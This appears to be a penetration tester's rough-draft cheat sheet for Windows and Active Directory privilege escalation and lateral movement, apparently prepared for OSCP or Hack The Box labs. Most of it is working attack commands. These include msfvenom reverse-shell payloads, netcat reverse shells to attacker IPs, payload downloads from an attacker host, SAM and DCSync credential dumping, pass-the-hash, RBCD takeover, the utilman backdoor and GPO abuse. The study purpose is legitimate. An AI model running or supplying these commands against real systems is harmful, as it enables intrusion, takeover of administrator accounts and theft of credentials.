Rough Draft

UNSORTED: Draft 1

PowerShell Execution Policy Bypass

First thing we need to do is this

powershell.exe -nop -exec bypass
powershell.exe  -nop -ep bypass
powershell -ep bypass

Enable Alternate Methods for Lateral-Movement

Enable RDP

reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f

Enable PS-Remoting

Enable-PSRemoting -Force

Add New user or Add Machine user to Administrators (Local)

# New User
net localgroup [username] [password] /add
# Macine user to Administrators group
net localgroup administrators [username] /add

Enumeration

Manual Checks

Windows local Privesc

--------------------------------------------
#system, OS, architecture information 
--------------------------------------------
systeminfo
wmic qfe
hostname
--------------------------------------------
#users-groups
--------------------------------------------
whoami 
whoami /priv
whoami /all
cmdkey /list
---
get-addomain
net user /domain
net user username /domain
net group 
net group group-name /domain
--------------------------------------------
#passwords-hunting
--------------------------------------------
findstr /si password *.txt 
reg query HKLM /f password /t REG_SZ /s 
dir /s *pass*
--------------------------------------------
#Schedule task
--------------------------------------------
schtasks /query /fo LIST /v
--------------------------------------------
#Service-Misconfiguration
--------------------------------------------
sc qc <service_name>
sc query state= all 
accesschk.exe -uwcqv "Authenticated Users" *

---

File Search

Check Hidden passwords in files

Get-ChildItem -Path C:\ -Include *.kdbx -File -Recurse -ErrorAction SilentlyContinue

Get-ChildItem -Path C:\xampp -Include *.txt,*.ini -File -Recurse -ErrorAction SilentlyContinue

Get-ChildItem -Path C:\Users\ -Include *.txt,*.pdf,*.xls,*.xlsx,*.doc,*.docx -File -Recurse -ErrorAction SilentlyContinue

Add User to Administrators Group

# Add
Add-LocalGroupMember -Group Administartors -Member ariah

# Verify
whoami /groups

Check Outdated OS Version / Name || Check Kernal Exploit

systeminfo

Some Outdated OS version with Kernal exploit :-

• Window 2008

Host Name:                 LIVDA
OS Name:                   Microsoftr Windows Serverr 2008 Standard 
OS Version:                6.0.6001 Service Pack 1 Build 6001

• exploit

https://github.com/SecWiki/windows-kernel-exploits/blob/master/MS11-046/ms11-046.exe

---

Powershell History file

Winpeas can give the result for this , but to check manually, navigate to directory :-

C:\Users\legacyy\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine

LAPS reader

Local Administrator Password Solution (LAPS)

check if user has *LAPS_Readers enabled

net user svc_deploy

extract passwords :-

• using linux

nxc ldap 10.10.11.152 -u svc_deploy -p 'E3R$Q62^12p7PLlC%KWaxuaV' -M laps

• using windows

Get-ADComputer DC01 -property * | findstr ms-Mcs-AdmPwd

getting rev-shell

sudo rlwrap -cAr nc -lvnp 445

---

Always-Install-Elevated

Check winpeas result first to confirm whether Always_Install_Elevated is enabled or not

Exploitation

• Create reverse shell in .msi format

msfvenom -p windows/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f msi > program.msi

# 64 bit
msfvenom -p windows/x64/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f msi > program.msi

• Transfer it to victim machine and setup the listener on attacker and run below command

.\program.msi
# OR
msiexec /quiet /qn /i program.msi

---

Lateral-Movement

• use Ps-exec to get shell as nt authority\system

impacket-psexec Administrator@10.10.10.175 -hashes LMLMLMLMLMLMLMLMLM:NTNTNTNTNTNTNTNTNT

• use WMI or evil-winrm to get shell as Administrator

impacket-wmiexec -hashes 'LMLMLMLMLMLMLM:NTNTNTNTNTNTNT' -dc-ip 10.10.10.175 administrator@10.10.10.175

• use evil-winrm

evil-winrm -i 10.10.10.175 -u administrator -H d9485863c1e9e05851aa40cbb4ab9dff

---

SeBackupPrivilege

From window (evil-winrm) session

# Check
whoami /priv

# Exploit
cd c:\
mkdir Temp
reg save hklm\sam c:\Temp\sam
reg save hklm\system c:\Temp\system

# File-download
download sam
download system

From linux session

# Extract hashes
pypykatz registry --sam sam system

# Shell
evil-winrm -i 192.168.1.41 -u raj -H "##Hash##"

SeRestorePrivilege

From window (evil-winrm) session

1. Rename utilman.exe to utilman.old and cmd.exe to utilman.exe

cd C:\Windows\System32

C:\Windows\System32> ren utilman.exe utilman.old
C:\Windows\System32> ren cmd.exe utilman.exe

From Linux session

rdesktop $ip

This will open a new rdp window to target system

1. On system press the below key shortcut

win + u

We get the shell as root

SeImpersonatePrivilege

Download GodPotato

https://github.com/BeichenDream/GodPotato/releases/tag/V1.20

check .NET version before uploading the binary {Not Compulsory}

reg query "HKLM\SOFTWARE\Microsoft\Net Framework Setup\NDP" /s

Exploit

# Command Execute 
.\godpotato.exe -cmd “cmd /c whoami”

# Reverse shell
.\godpotato.exe -cmd “C:\Temp\nc.exe -e cmd 192.168.45.198 1331”

---

Abusing Full Permission on Binary .exe File

Recon

. .\PowerUp.ps1; Invoke-AllChecks

Confirm File permissions

icaclls “C:\Users\Ela Arwel\Veyon\veyon-service.exe”

Generate malicious .exe file as reverse shell

msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.45.159 LPORT=1338 -f exe -o rev.exe

Transfer and replace it with original binary

Iwr -Uri http://attacker-ip/rev.exe -Outfile rev.exe

mv “C:\Users\Ela Arwel\Veyon\veyon-service.exe” “C:\Users\Ela Arwel\Veyon\veyon-service-old.exe”
mv rev.exe “C:\Users\Ela Arwel\Veyon\veyon-service.exe”

If Possible [Restart service]

Restart-service VeyonService

If Not Possible [Shutdown]

# Keep listener running and wait for connection
shutdown /r /t 0

---

AD recycle bin enumeration

https://www.scriptinghouse.com/2017/04/active-directory-recycle-bin-restore-deleted-objects-or-wipe-off-your-bin.html

# Filter deleted objects 
Get-ADObject -filter 'isDeleted -eq $true -and name -ne "Deleted Objects"' -includeDeletedObjects
Get-ADObject -filter {Deleted -eq $True -AND Name -ne "Deleted Objects"} -IncludeDeletedObjects

# Filter deleted-object class
Get-ADObject -filter 'isDeleted -eq $true -and name -ne "Deleted Objects"' -includeDeletedObjects | select Name,ObjectClass

Get-ADObject -filter { SAMAccountName -eq "TempAdmin" } -includeDeletedObjects -property *

---

Generic All on user / Force-Change-Password

Linux

net rpc password "targetUSER" "NewPass@123" -U "administrator.htb"/compromisedUSER%Passw@123 -S 10.10.11.42

Windows

# Normal change
net user <USERNAME> <PASSWORD> /domain

# Force change
. .\powerview.ps1
$UserPassword = ConvertTo-SecureString '<PASSWORD>' -AsPlainText -Force
Set-DomainUserPassword -Identity <USERNAME> -AccountPassword $UserPassword

Generic Write on user

Linux

# Add the `msDs-KeyCredentialLink` attribute to the targetUSER
pywhisker -d "administrator.htb" -u "comromisedUSER" -p 'ichliebedich' --target "targetUSER" --action "add"

# Request the TGT for 
targetedKerberoast.py -v -d 'administrator.htb' -u 'comromisedUSER' -p ichliebedich

# Crack the hash
john hash.txt /usr/share/wordlist/rockyou.txt

---

Generic All on DC

Add machine account

. .\powermad.ps1
New-MachineAccount -MachineAccount xxx  -Password $(ConvertTo-SecureString 'Pass@1234' -AsPlainText -Force)

Retrieve SID of it

. .\powerview.ps1
get-domaincomputer | select name,samaccountname,Objectsid

---

Server Operator group

The member of this group can start/stop any service.

# Hunt for server operator group
whoami /groups

# Configure the malicious service
sc.exe config vss binPath="C:\Windows\System32\cmd.exe /c C:\Users\svc-printer\Documents\nc.exe -e cmd 10.10.14.7 1234"

# run it
sc.exe stop vss
sc.exe start vss

---

UNSORTED : Draft 2

---

Generic All

Generic All on User

Force-Change-Password

Linux

net rpc password "targetUSER" "NewPass@123" -U "administrator.htb"/compromisedUSER%Passw@123 -S 10.10.11.42

Windows

# Normal change
net user <USERNAME> <PASSWORD> /domain

# Force change
. .\powerview.ps1
$UserPassword = ConvertTo-SecureString '<PASSWORD>' -AsPlainText -Force
Set-DomainUserPassword -Identity <USERNAME> -AccountPassword $UserPassword

Generic All on Group

Add Member

• Linux

net rpc group addmem "Remote Access" "tracy.white" -U "USERNAME%PASSWORD" -S $ip

Generic Write on user

Linux

# Add the `msDs-KeyCredentialLink` attribute to the targetUSER
pywhisker -d "administrator.htb" -u "comromisedUSER" -p 'ichliebedich' --target "targetUSER" --action "add"

# Request the TGT for 
targetedKerberoast.py -v -d 'administrator.htb' -u 'comromisedUSER' -p ichliebedich

# Crack the hash
john hash.txt /usr/share/wordlist/rockyou.txt

---

Generic All on Computer / DC-computer

RBCD

Link :

Kerberos Resource-based Constrained Delegation: Computer Object Takeover | Red Team Noteswww.ired.team

Linux Exploitation

1. Add computer

impacket-addcomputer resourced.local/l.livingstone -dc-ip $ip -hashes ':19a3a7550ce8c505c2d46b5e39d6f808' -computer-name 'fake01' -computer-pass '123456'

1. Set 'msDS-AllowedToActOnBehalfOfOtherIdentity' to target computer

impacket-rbcd -delegate-to 'comp01$' -delegate-from 'fake01$' -action 'write' 'domain/user:password'
# OR
rbcd.py -dc-ip $ip -t DC01 -f fake01 -hashes :19a3a7550ce8c505c2d46b5e39d6f808 resourced\\l.livingstone

1. Obtain Service Ticket

impacket-getST -spn cifs/resourcedc.resourced.local -impersonate Administrator resourced/fake\\$:'123456' -dc-ip $ip

1. Map the ip with domain/local (for computer) & DC.domain.local (for DC-computer)

# Manuall map it or
sudo sh -c 'echo "192.168.167.175 resourcedc.resourced.local" >> /etc/hosts'

1. Export Administrator.ccahe file in current environment

# look for the exact file name
ls

# export it
export KRB5CCNAME=./Administrator.ccache

1. Perform PTT (pass the ticket) and drop the shell

sudo impacket-psexec -k -no-pass resourcedc.resourced.local -dc-ip $ip

Windows Exploitation [less recommended for OSCP]

Upload and import all scripts

. .\powermad.ps1
import-module .\powermad.ps1

. .\powerview.ps1
import-module .\powerview.ps1

1. Add computer

New-MachineAccount -MachineAccount FAKE01 -Password $(ConvertTo-SecureString '123456' -AsPlainText -Force) -Verbose

1. Get SID for newly created object

# Either set in variable
$ComputerSid = Get-DomainComputer FAKE01 | Select -Expand objectsid

# Or Manuall grab and put
Get-DomainComputer FAKE01 | Select -Expand objectsid

1. Get binary bytes

$SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;$($ComputerSid))"
$SDBytes = New-Object byte[] ($SD.BinaryLength)
$SD.GetBinaryForm($SDBytes, 0)

1. Set 'msDS-AllowedToActOnBehalfOfOtherIdentity' field of the comptuer we're taking over

Get-DomainComputer comp01 | Set-DomainObject -Set @{'msds-allowedtoactonbehalfofotheridentity'=$SDBytes}

# verify
Get-DomainComputer resourcedc -Properties 'msds-allowedtoactonbehalfofotheridentity'

1. Calculate the hash for your password, to use it in next command

.\rubeus.exe hash /password:123456

1. PTT pass-the-ticket

# Format
Rubeus.exe s4u /user:attackersystem$ /rc4:EF266C6B963C0BB683941032008AD47F /impersonateuser:admin /msdsspn:cifs/TARGETCOMPUTER.testlab.local /ptt

# command
.\rubeus.exe s4u /user:fake01$ /rc4:32ED87BDB5FDC5E9CBA88547376818D4 /impersonateuser:Administrator /msdsspn:cifs/resourcedc.resourced.local /ptt

1. PsExec

.\psexec.exe \\resourcedc cmd

Usually it does not work if you already taken shell on the system

DC-Sync

Exploitation

Linux

impacket-secretsdump egotistical-bank.local/fsmith@10.10.10.175

Win-exe

.\mimikatz.exe 'lsadump::dcsync /domain:EGOTISTICAL-BANK.LOCAL /user:administrator' exit

Win-ps1

Invoke-mimikatz -command lsadump::dcsync /domain:EGOTISTICAL-BANK.LOCAL /user:administrator

GPO abuse

Generic-Write | WriteDACL | Write-Owner

Add Local Admin

# From window session [evil-winrm]
upload sharpgpoabuse.exe

# Add our user account to the local Administrators group
.\sharpgpoabuse.exe --AddLocalAdmin --UserAccount anirudh --GPOName "Default Domain Policy"

# Update gpo
gpupdate /force

# Verify
net localgroup Administrators

# Lateral-Movement via Linux
impacket-psexec vault.offsec/anirudh:SecureHM@$ip

---

Server Operator group

The member of this group can start/stop any service.

# Hunt for server operator group
whoami /groups

# Configure the malicious service
sc.exe config vss binPath="C:\Windows\System32\cmd.exe /c C:\Users\svc-printer\Documents\nc.exe -e cmd 10.10.14.7 1234"

# run it
sc.exe stop vss
sc.exe start vss

---

GMSAPasswordReader

Exploitation

From windows (evil-winrm)

gmsapasswordreader.exe --accountname svc_apache

From Linux (Not recommended from OSCP)

gMSADumper.py -u 'user' -p 'password' -d 'domain.local'